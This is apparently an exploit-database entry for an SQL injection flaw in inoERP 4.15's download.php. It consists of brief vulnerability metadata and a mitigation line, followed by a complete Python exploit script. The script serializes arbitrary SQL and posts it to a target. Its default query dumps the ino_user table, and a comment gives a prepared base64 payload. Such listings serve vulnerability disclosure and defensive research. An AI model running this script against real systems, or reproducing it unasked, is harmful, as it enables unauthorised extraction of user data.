inoERP 4.15 - 'download' SQL Injection

vendor:

inoERP

by:

Semen Alexandrovich Lyhin

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: inoERP

Affected Version From: 4.15

Affected Version To: 4.15

Patch Exists: NO

Related CWE: N/A

CPE: 2.3:a:inoideas.org:inoERP:4.15

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: None

2019

inoERP 4.15 – ‘download’ SQL Injection

A malicious query can be sent in base64 encoding to unserialize() function. It can be deserialized without any sanitization then. After it, it gets passed directly to the SQL query.

Mitigation:

Ensure that user input is properly sanitized and validated before being passed to the SQL query.

Source

Exploit-DB raw data:

# Exploit Title: inoERP 4.15 - 'download' SQL Injection
# Date: 2019-09-13
# Exploit Author: Semen Alexandrovich Lyhin
# Vendor Homepage: http://inoideas.org/
# Version: 4.15
# CVE: N/A

# A malicious query can be sent in base64 encoding to unserialize() function.
# It can be deserialized without any sanitization then.
# After it, it gets passed directly to the SQL query.


#!/bin/python

import os
import base64
import requests
import sys

def generatePayload(query):
    #THIS FUNCTION IS INSECURE BY DESIGN
    b64_query = base64.b64encode(query);
    return os.popen("php -r \"echo base64_encode(serialize(base64_decode('" + b64_query + "')));\"").read()
    

def ExecSQL(query):
    data = {"data":query,
            "data_type":"sql_query"}
         
    r = requests.post("http://" + ip + "/download.php", data=data)
    return r.content


if __name__ == "__main__":
    
    if len(sys.argv) != 3:
        print '(+) usage: %s <target> ' % sys.argv[0]
        print '(+) eg: %s 127.0.0.1 "ierp/" ' % sys.argv[0]
        exit()
    
    ip = sys.argv[1] + "/" + sys.argv[2]
    
    #if don't have php, set Payload to the next one to check this SQLi via "select @@version;" payload: czoxNzoic2VsZWN0IEBAdmVyc2lvbjsiOw== 
    
    data = r"select * from ino_user;"
    
    print ExecSQL(generatePayload(data));